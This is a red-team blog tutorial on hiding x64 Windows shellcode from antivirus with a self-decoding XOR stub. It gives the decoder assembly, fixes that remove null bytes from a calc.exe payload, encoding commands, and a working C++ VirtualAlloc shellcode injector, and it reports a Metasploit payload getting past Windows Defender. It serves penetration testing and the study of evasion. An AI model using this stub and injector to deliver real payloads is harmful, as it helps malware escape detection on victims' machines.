{{tag>IT-Security Windows Kali pentest obfuscation blog english}}

====== Obfuscation: polymorphic in-memory decoder ======

{{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}}

Red-team engagements and penetration tests often require bypassing virus scanners in order to uncover security vulnerabilities effectively. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we disguised shellcode as UUIDs in the source code. This worked well, but the shellcode was recognised and blocked once it was in memory.

We now want to solve this with a polymorphic in-memory decoder: shellcode that decodes shellcode.

===== XOR decoder =====

I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:

<code asm>
_start:
    jmp short call_decoder      ; Begin of JMP-CALL-POP
</code>

''%%JMP-CALL-POP%%'' is a technique for position-independent code: it lets the code determine its own address in memory, no matter where it was loaded. In this first step, we jump to the label ''%%call_decoder%%''.

<code asm>
call_decoder:
    call decoder        ; pushes the address of the next byte (the shellcode) onto the stack

    ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6...
</code>

The ''%%CALL%%'' instruction jumps back to the label ''%%decoder%%''. In doing so, it pushes the return address, i.e. the address of the byte directly after the ''%%CALL%%'' (in our case the encoded shellcode), onto the stack, and ''%%RSP%%'' now points to it.

<code asm>
decoder:
    pop rsi                     ; Move pointer to encoded shellcode into RSI from the stack
</code>

In the called part of the programme, ''%%POP%%'' moves this address from the stack into the register ''%%RSI%%''. Now we know where our shellcode is located in memory.
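Why jump forward first and then ''%%CALL%%'' backwards? The following Python sketch computes the relative displacements of the stub. It assumes the standard x86-64 instruction sizes noted in the comments and the label layout of the complete stub, including the decode loop described next; the helper names ''%%rel8%%'' and ''%%rel32%%'' are hypothetical. Because ''%%call decoder%%'' jumps backwards, its 32-bit displacement is negative and contains no 0 bytes, whereas a forward ''%%CALL%%'' over the payload would (the 251-byte payload length in the counterexample is only illustrative).

```python
# Hypothetical helper sketch: relative displacements in the JMP-CALL-POP stub.
# Offsets assume standard x86-64 encodings for each instruction.

def rel8(next_ip: int, target: int) -> int:
    """Displacement byte of a short jump (target minus address of next instruction)."""
    disp = target - next_ip
    assert -128 <= disp <= 127, "target out of short-jump range"
    return disp & 0xFF


def rel32(next_ip: int, target: int) -> bytes:
    """Little-endian 32-bit displacement of CALL rel32."""
    return ((target - next_ip) & 0xFFFFFFFF).to_bytes(4, "little")


# Label offsets inside the stub (bytes from _start)
START = 0         # jmp short call_decoder   EB rel8      (2 bytes)
DECODER = 2       # pop rsi                  5E           (1 byte)
DECODE = 3        # xor byte [rsi], 0x3F     80 36 3F     (3 bytes)
JZ = 6            # jz Shellcode             74 rel8      (2 bytes)
INC = 8           # inc rsi                  48 FF C6     (3 bytes)
LOOP = 11         # jmp short decode         EB rel8      (2 bytes)
CALL = 13         # call decoder             E8 rel32     (5 bytes)
SHELLCODE = 18    # encoded payload follows the CALL

jmp_fwd = rel8(START + 2, CALL)        # forward to call_decoder
jz_out = rel8(JZ + 2, SHELLCODE)       # exit to the decoded payload
loop_back = rel8(LOOP + 2, DECODE)     # back to the XOR
call_back = rel32(CALL + 5, DECODER)   # backwards: negative displacement

# Counterexample: a CALL placed *before* a 251-byte payload jumps forward
call_fwd = rel32(5, 5 + 251)

print(f"jmp short: {jmp_fwd:02x}, jz: {jz_out:02x}, loop: {loop_back:02x}")
print("call backwards:", call_back.hex(" "), "-> 0x00 inside:", 0 in call_back)
print("call forwards: ", call_fwd.hex(" "), "-> 0x00 inside:", 0 in call_fwd)
```

The values ''%%0b%%'' and ''%%0a%%'' match the ''%%eb 0b%%'' and ''%%74 0a%%'' bytes at the start of the compiled decoder in the ''%%inspect%%'' output further down.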

Now we move on to the actual decryption routine:

<code asm>
decode:
    xor byte [rsi], 0x3F      ; XOR the byte RSI points to with 0x3F
    jz Shellcode              ; result is 0 (terminator reached): jump to the decoded shellcode
    inc rsi                   ; increment RSI to decode the next byte
    jmp short decode          ; loop until each byte was decoded
</code>

''%%xor byte [rsi], 0x3F%%'' decodes the byte addressed by ''%%RSI%%''; in the first pass, this is the first byte of the shellcode. The key ''%%0x3F%%'' must match the key that was used to encode the shellcode.

''%%jz Shellcode%%'' then checks whether the decoded byte is ''%%0x00%%'': the ''%%XOR%%'' sets the zero flag if its result is 0.

==== $Byte \neq 0$ ====

If the decoded byte is not 0, execution continues with the next instruction: ''%%inc rsi%%''

''%%RSI%%'' is incremented and thus points to the next byte of the shellcode, which is decoded in the next iteration. ''%%jmp short decode%%'' jumps back to the start of the loop.

==== $Byte = 0$ ====

If the decoded byte is 0, the loop ends and the shellcode is executed. This is why the key must be appended to the encoded shellcode as its last byte:

''%%0x3F XOR 0x3F = 0x00%%''

This terminator marks the end of the shellcode and ends the loop, so we do not need a separate length counter.

''%%jz Shellcode%%'' then jumps directly to our decoded shellcode and executes it.
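To make the loop logic tangible, here is a minimal Python model of the decoder, assuming the key ''%%0x3F%%''. ''%%xor_encode%%'' and ''%%decode_in_place%%'' are hypothetical names for illustration, not ShenCode functions. The index variable plays the role of ''%%RSI%%'', and the loop stops at the first byte that XORs to ''%%0x00%%'', i.e. the appended key.

```python
KEY = 0x3F  # must match the immediate in "xor byte [rsi], 0x3F"


def xor_encode(plain: bytes, key: int = KEY) -> bytes:
    """XOR every byte and append the key as terminator (it decodes to 0x00)."""
    if 0 in plain:
        raise ValueError("payload contains 0x00 and would stop the decoder early")
    return bytes(b ^ key for b in plain) + bytes([key])


def decode_in_place(buf: bytearray, key: int = KEY) -> int:
    """Model of the assembly loop; returns the offset of the terminator."""
    rsi = 0
    while True:
        buf[rsi] ^= key       # xor byte [rsi], key
        if buf[rsi] == 0:     # jz Shellcode (zero flag set by the XOR)
            return rsi
        rsi += 1              # inc rsi, then jmp short decode


plain = bytes.fromhex("4831c0c3")  # xor rax, rax ; ret (harmless sample bytes)
buf = bytearray(xor_encode(plain))
print("encoded:", buf.hex(" "))
end = decode_in_place(buf)
print("decoded:", buf[:end].hex(" "), "| terminator at offset", end)
```

The model also shows why no counter is needed: the length is implied by the position of the terminator.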

===== calc.exe Payload =====

We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|this blog post]]. However, it still contains 0 bytes, which break the decoding. Why is this the case? Here is an example:

<code>
# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F

# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00
</code>

A 0 byte in the original payload would therefore end the decoding loop early, since ''%%jz Shellcode%%'' treats it as the termination signal. We therefore need to make a few modifications.
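A quick way to spot the problem before encoding is to scan the raw payload for ''%%0x00%%'' and check where a loop like the decoder above would stop. The sketch assumes the key ''%%0x3F%%''; ''%%first_stop%%'' is a hypothetical helper, and the sample bytes are the old GS sequence from the next section (''%%xor rax, rax%%'', ''%%mov al, 60h%%'', ''%%mov rax, gs:[rax]%%''), whose last byte is ''%%0x00%%''.

```python
KEY = 0x3F


def first_stop(plain: bytes, key: int = KEY) -> int:
    """Offset at which the XOR loop stops on the encoded payload plus terminator."""
    encoded = bytes(b ^ key for b in plain) + bytes([key])
    for offset, byte in enumerate(encoded):
        if byte ^ key == 0:   # what jz Shellcode tests after the XOR
            return offset
    raise AssertionError("unreachable: the terminator always decodes to 0x00")


# 48 31 c0 | b0 60 | 65 48 8b 00  (old GS code from the next section)
sample = bytes.fromhex("4831c0" "b060" "65488b00")
nulls = [i for i, b in enumerate(sample) if b == 0]
print("0x00 at offsets:", nulls)
print("loop stops at offset", first_stop(sample), "of", len(sample) + 1, "bytes")
```

Only when ''%%first_stop%%'' returns ''%%len(payload)%%'', i.e. the position of the appended key, is the whole payload decoded.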

==== GS Register ====

The fix for the GS register from the previous post only removes two of the three 0 bytes. That was sufficient for the previous tests; here, a small change removes the remaining one:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov al, 60h
mov rax, gs:[rax]             ; 65 48 8b 00
</code>

Change this to:

<code asm [enable_line_numbers="true",start_line_numbers_at="26"]>
xor rax, rax
mov rax, gs:[rax+0x60]        ; 65 48 8b 40 60
</code>

As a side effect, this shortens the shellcode by one byte (8 instead of 9 bytes for this sequence).

==== Kernel32-Base ====

When searching for the ''%%Kernel32Base%%'', both dereferences use only the register ''%%RAX%%'' without an offset. ''%%mov rax, [rax]%%'' is encoded as ''%%48 8b 00%%'' and therefore also contains a 0 byte. By using ''%%RBX%%'' for the intermediate pointer, we avoid these 0 bytes.

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rax, [rax]				; 48 8b 00
mov rax, [rax]  			; 48 8b 00
</code>

Change this to:

<code asm [enable_line_numbers="true",start_line_numbers_at="30"]>
mov rbx, [rax]  			; 48 8b 18
mov rax, [rbx]   			; 48 8b 03
</code>

==== JMP SHORT ====

<code asm [enable_line_numbers="true",start_line_numbers_at="76"]>
jmp short InvokeWinExec            ; eb 00
</code>

The jump targets the instruction immediately following it (displacement 0, hence the 0 byte). Since execution continues there anyway without the ''%%JMP%%'', we can simply comment out the line.
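The effect of the three changes can be checked against the opcode bytes given in the comments of the snippets above. This small Python sketch only uses those byte sequences (no assembler involved) and reports whether each one is free of 0 bytes.

```python
# Opcode bytes as listed in the comments of the code snippets above
encodings = [
    ("mov rax, gs:[rax]",       "65 48 8b 00",    "old"),
    ("mov rax, gs:[rax+0x60]",  "65 48 8b 40 60", "new"),
    ("mov rax, [rax]",          "48 8b 00",       "old"),
    ("mov rbx, [rax]",          "48 8b 18",       "new"),
    ("mov rax, [rbx]",          "48 8b 03",       "new"),
    ("jmp short InvokeWinExec", "eb 00",          "old (removed)"),
]

for asm, hexbytes, state in encodings:
    null_free = 0 not in bytes.fromhex(hexbytes)
    print(f"{asm:<25} {hexbytes:<16} {state:<14} null-free: {null_free}")
```

Every "old" encoding contains ''%%0x00%%'', every "new" one does not.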

==== Compile ====

We can now compile the code and get opcode without 0 bytes.

<code batch>
nasm -f win64 calc.asm -o calc.o
</code>

===== XOR decoder stub =====

==== Prepare calc.exe payload ====

We now need to prepare the opcode a little before we can use it in the decoder. I use my shellcode tool [[https://github.com/psycore8/shencode|ShenCode]] for this:

<code python>
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
</code>

Step by step:

  - We extract the actual shellcode from the file ''%%calc.o%%'' (from offset ''%%60%%'' to ''%%311%%'') and save it in ''%%calc.raw%%''
  - We encode the extracted code with the key ''%%63%%'' (decimal, corresponds to ''%%0x3F%%'' hexadecimal) and save the result in ''%%calc.xor%%''
  - We output the encoded shellcode in C# format, which NASM also accepts in a ''%%db%%'' directive
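Conceptually, the three steps boil down to slicing, XOR and formatting. The following Python sketch is not ShenCode's implementation: the function names are hypothetical, and it assumes the end offset is exclusive, like a Python slice. It also appends the ''%%0x3F%%'' terminator from the next step. The four demo bytes are illustrative (''%%push rbp; mov rbp, rsp%%''); XOR-ing them with ''%%0x3F%%'' yields the same leading bytes ''%%0x6a,0x77,0xb6%%'' as the output above.

```python
from pathlib import Path

KEY = 63  # 0x3F


def extract(obj: bytes, first: int, last: int) -> bytes:
    """Cut the shellcode out of the object file (assumption: 'last' is exclusive)."""
    return obj[first:last]


def xor_encode(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with the key."""
    return bytes(b ^ key for b in data)


def as_db_list(data: bytes, key: int = KEY) -> str:
    """Comma-separated hex list for a NASM 'db', with the key appended as terminator."""
    return ",".join(f"0x{b:02x}" for b in data + bytes([key]))


def prepare(path: str, first: int, last: int) -> str:
    """File-based variant of the three steps, e.g. prepare('calc.o', 60, 311)."""
    return as_db_list(xor_encode(extract(Path(path).read_bytes(), first, last)))


# In-memory demo: 60 bytes of fake header, then push rbp ; mov rbp, rsp
fake_obj = bytes(60) + bytes.fromhex("554889e5") + bytes(8)
print(as_db_list(xor_encode(extract(fake_obj, 60, 64))))
```

The demo prints ''%%0x6a,0x77,0xb6,0xda,0x3f%%''; the last byte is the appended key.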

We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end.

==== XOR decoder and payload ====

Now we can add our payload to the XOR decoder. To do this, we paste the prepared bytes into the ''%%db%%'' directive at the end of the XOR decoder:

<code asm>
 ; The encoded shellcode
    Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
</code>

We also check that the XOR key in the decoder matches the key used for encoding:

<code asm>
decode:
    xor byte [rsi], 0x3F
</code>

If everything is correct, we compile our decoder:

<code batch>
nasm -f win64 xor-decoder.asm -o xor-decoder.o
</code>

We then search for the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file:

<code python>
python shencode.py formatout -i xor-decoder.o -s inspect

0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80     Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00     Offset=329
0x00000336: 00 00 00 00 00 fe ff 00

python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329

[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!

python shencode.py formatout -i xor-decoder.stub -s c

[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
</code>

===== Inject.cpp =====

We can now insert the bytes we have just prepared into our injector programme and compile it.

<code cpp>
#include <stdio.h>
#include <windows.h>
#include <iostream>

unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";

int main() {
    size_t byteArrayLength = sizeof(payload);
    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
    void* (*memcpyPtr) (void*, const void*, size_t);
    void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpyPtr = &memcpy;
    memcpyPtr(exec, payload, byteArrayLength);
    ((void(*)())exec)();
    return 0;
}
</code>

===== Debug =====

For testing purposes, I started a debugger and navigated to the memory region of the XOR decoder. While stepping through, you can watch the instructions in the lower area being decoded one by one. In the screenshots below, this is the area after the ''%%call%%'' instruction, which corresponds to ''%%Shellcode: db ...%%''.

{{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}}

{{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}}

{{it-security:blog:2024-250-animation.gif|}}

The animation above shows the decoding loop running while the shellcode in the lower area is decoded byte by byte.

===== Test with a Metasploit payload =====

The whole thing also works with a Metasploit payload:

{{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}}

===== Conclusion =====

To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]]. With two commands, we generate an XOR in-memory decoder:

<code python>
python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63
</code>

The XOR decoder keeps the payload encoded in memory until it is executed, which makes signature-based in-memory detection harder. In combination with other obfuscation techniques, it can be a useful helper for penetration tests. In my test, even the Metasploit payload was not detected by Windows Defender.

~~DISCUSSION~~